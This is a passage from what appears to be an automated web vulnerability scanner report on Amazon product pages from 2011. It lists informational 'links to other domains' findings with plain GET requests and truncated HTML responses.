p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: BhM/yiIeeNmHNPnM+XNOpz2cQi2I5DL2kxxjVh9EGVEK3Otk7l2KJ92BEBUF6OSA
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0598759-1123006; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=5+EPReZ8AKa7WMIFgy9cHbJVm/9tgaQgv25tnd2EAaj3A2TcoX3BYNQp+U2mBhaH6NNnCCgyjvtkzGGKQPpSQ8YmQMO5JCKLveLlxt9MugLIEpGsQ9/N5+Fno+1FBJOzE7k6DdNtiYO1TD+phGkOUWQ/bAQscWvK7bSH45/y7GXOXIwlbx9HtoYer2qT3bQI/XgRYyDrwUk/3MaxWfXupPISlccJHK+MMD1RlV2PpGnjij8hwxwPu8lFWY2ZyFBuWpfgJTPLmLB81bUuXAJVuEItWLbeo9hG152TFm3xHDssaIPB8rAFW82FLjl1caASZ+3mXZbbwjY5FdvZ3bSUoEYv4rJBnYTCCcuaPY0qDbp0lBhPOVi0eyvDVbNk4+/Hftrx7HmCu7QjCyC5NYd3aS1DdMQsjfynRE0x7QVCx6RwexxPari5JWk0LW4Q/jcI4R+KwxWl55I=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:26 2011 GMT
Content-Length: 378947


<html>
<head>


<style type="text/css"><!--


BODY { fo
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL500_AA300_.jpg" style="display:none;"/>
<img src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL75_AA30_.jpg" style="display:none;"/>
<img src="http://ecx.images-amazon.com/images/I/41dEc0Pyy-L._SL75_AA30_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
1G/ref=dp_image_z_0?ie=UTF8&n=3375251&s=sporting-goods" target="AmazonHelp" onclick="return amz_js_PopWin(this.href,'AmazonHelp','width=700,height=600,resizable=1,scrollbars=1,toolbar=0,status=1');" ><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL500_AA300_.jpg" id="prodImage" width="300" height="300" border="0" alt="Sportline Walking Advantage 228 Giant Stopwatch" onmouseover="" /></a>
...[SNIP]...
G/ref=dp_otherviews_z_0?ie=UTF8&s=sporting-goods&img=0" target="AmazonHelp" onclick="return amz_js_PopWin(this.href,'AmazonHelp','width=700,height=600,resizable=1,scrollbars=1,toolbar=0,status=1');" ><img src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL75_AA30_.jpg" width="30" height="30" border="0" /></a>
...[SNIP]...
G/ref=dp_otherviews_z_1?ie=UTF8&s=sporting-goods&img=1" target="AmazonHelp" onclick="return amz_js_PopWin(this.href,'AmazonHelp','width=700,height=600,resizable=1,scrollbars=1,toolbar=0,status=1');" ><img src="http://ecx.images-amazon.com/images/I/41dEc0Pyy-L._SL75_AA30_.jpg" width="30" height="30" border="0" /></a>
...[SNIP]...
link_354823682_1?ie=UTF8&node=3375251&field-hidden-keywords=sg0111oihdef&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=hero-quick-promo&pf_rd_r=09N75F9VXRTTHCJ6W4N0&pf_rd_t=201&pf_rd_p=1287188182&pf_rd_i=B000EFAO1G">
<img src="http://g-ecx.images-amazon.com/images/G/01/img10/x-site/winter-post-holiday/75/save-50_75._SS75_V205558317_.gif" width="75" align="left" alt="Deep Discounts on Thousands of Products in Sports & Outdoors" height="75" border="0" />
</a>
...[SNIP]...
...[SNIP]...
<a href="http://www.amazon.com/Sportline-Walking-Advantage-Giant-Stopwatch/dp/B000EFAO1G/ref=pd_bxgy_sg_img_a"><img src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL500_SS75_.jpg" width="75" alt="Sportline Walking Advantage 228 Giant Stopwatch" id="" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/ACCUSPLIT-Survivor-Stopwatch-Extra-Large-Display/dp/B0007ZGZUC/ref=pd_bxgy_sg_img_b"><img src="http://ecx.images-amazon.com/images/I/51SED5J6B4L._SL500_SS100_.jpg" width="75" alt="ACCUSPLIT Survivor Stopwatch with Clock and Extra-Large Display" id="" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51SED5J6B4L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51t69WdVNkL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41CAA69047L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/518SMLBsPdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41qLz9kHAnL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div id="mainItemImageContainer">
<img src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL500_SY90_.jpg" width="71" alt="" style="padding-left:10px;padding-right:9px" id="mainItemImage" class="product-image" height="90" border="0" />
</div>
...[SNIP]...
<a href="http://www.amazon.com/Stott-Pilates-Secret-Weight-Loss/dp/B000EMRT2Q/ref=acc_glance_sg_ai_-2_t_1" title="Stott Pilates The Secret to Weight Loss Gift Pack">
<img src="http://ecx.images-amazon.com/images/I/519XS1AS1QL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Sportline-Walking-Advantage-Alpha-Stopwatch/dp/B000EG4614/ref=acc_glance_sg_ai_-2_t_2" title="Sportline Walking Advantage 410 Alpha Stopwatch">
<img src="http://ecx.images-amazon.com/images/I/31Y8BHTJ6FL._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<a href="http://www.amazon.com/Sportline-Walking-Advantage-Count-Pedometer/dp/B000C3U9II/ref=acc_glance_sg_ai_-2_t_3" title="Sportline Walking Advantage 330 Step Count Pedometer">
<img src="http://ecx.images-amazon.com/images/I/41IOZx3OE0L._SL500_SS100_.jpg" width="100" alt="" class="product-image" height="100" border="0" /><br>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41V%2BeXjhmOL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/419XADDZEQL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41qahKV5tbL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41whOSISqRL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41BjBfz6r8L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41CAA69047L._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/183-0598759-1123006"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.550. http://www.amazon.com/dp/B001AIM6V2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /dp/B001AIM6V2

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/dp/B001AIM6V2?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B001AIM6V2&adid=1E43GGA9XAJKCAEXAPNZ&
The response contains the following links to other domains:

Request

GET /dp/B001AIM6V2?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B001AIM6V2&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:05:20 GMT
Server: Server
x-amz-id-1: 0JE81R4J15T5AK071TZV
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 4o8GRyUKmn3DkY5PnyV64O2bpKKjAgNwr+I4JvwWlUHgakGrnSAutbBsj2pwvLzy
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-9936733-9404845; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=gpJo3CBiqTqDVIjaNvl4zvNYaep1x/cFw36XGdvu+t3AZoNYj5i0ue/20d7C2ZC+I33rSpZQv0bL0wk1Ew8YoO+rtNcIBPKLYOhOlxvFtzRIdn3kvGu6M4tMOkmBEeryBbTVlsJzSNcfMpAFM/xng7ZCP9yYT0m2OdKey3rxmCeD+Fl0AmJvQvFSHWkk425/o8Da9DpaI74WLGaJ7uNOvo6JLwZb5sYP9TvVnm5hmJQsWKXZoF2OyiWVivGgzTAUd6pRUIbYAZkt1sGVL+jil+zZfxZVnjBewrBhOy9v7AhUD8T6SoAGbb4KE5ZJBYWH2OXsSjuLHVIc52YxHzs6raEMD1dV4RY1XTDpsD0MSkGHFH6QBIcq1zDxTwlTMAha08n0zKNwM+cU9SxT/rymeyJe0yjBe5km9qvYTfgoBDkuOc+G0APo8cpXuSfIyagOnBt68PFK8so=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:21 2011 GMT
Content-Length: 243877


<html>
<head>


<style type="text/css"><!--


BODY { fon
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/gridCSS/US-combined-1136328220.css._V175075348_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/51K2a3Cte9L._SL500_AA300_.jpg" style="display:none;"/>
</div>
...[SNIP]...
ges/B001AIM6V2/ref=dp_image_0?ie=UTF8&n=283155&s=books" target="AmazonHelp" onclick="return amz_js_PopWin(this.href,'AmazonHelp','width=700,height=600,resizable=1,scrollbars=1,toolbar=0,status=1');" ><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/51K2a3Cte9L._SL500_AA300_.jpg" id="prodImage" width="300" height="300" border="0" alt="Cowboys &amp; Indians The Premier Magazine of the West, Annual Holiday Gift Guide December 2007, Vol. 15, No. 8, Sam Elliott" onmouseover="" /></a>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/videoreview._V192249916_.jpg" width="109" alt="Video reviews" height="94" border="0" />
</td>
...[SNIP]...
</div>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />


<script type="text/javascript">
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/183-9936733-9404845"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.551. http://www.amazon.com/dp/B0037UT1LY

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /dp/B0037UT1LY

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/dp/B0037UT1LY?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B0037UT1LY&adid=1E43GGA9XAJKCAEXAPNZ&
The response contains the following links to other domains:
  • http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
  • http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
  • http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

GET /dp/B0037UT1LY?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B0037UT1LY&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:34 GMT
Server: Server
x-amz-id-1: 17DR8YMYSFMRZS8CDJ3Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: VnWywM5oGusSEKwA0oEmF9YQZW0sC+3d/bn1D6tOPMIwmjnxiuAhufUUuKPMm5+U
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=188-3953038-0825847; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=bK6rGx+CGyD+cP8GmimTlX4yOKqJEvwu6UnJY2SjL1UcG5vQjcyPPRSMkmQN8sbphtWyqe3kQNCI8rylaXXfj7BtPqZ81YiplXuRUKMy3Z/2mvrL0RV2OkiG88oBA7HbQe9Kd7fvezmpNGVnUs/WKVjx/v0XDHsIO3F31lrklY6f9VkJODasmR+vrmz5jfMxq2bRIKLa3TnEq25JcifPmFz90PVXykz/U8VHJ0uNE7A+Lbt2L2Z/SjjIzqMfkvaEaJ5CGm8K5P8lXwVh0vUHjthXVRSI9Cep53mqSnG9l0pUNqqdm4ZhxMz2Fnam7evwK9iiJKrdcr/H6916sNYxoaW3SE1y+GzhrAbM2j5TccGcCjdm1TEIUPGgRv1ET/0d7xHLJPqSIn5j3GRpNMwhQIwtYGX6XK/au2mTa3txsuMyDFNmteb/ybxsSFJKnNmQPriNDYGWivE=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:34 2011 GMT
Content-Length: 440777


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

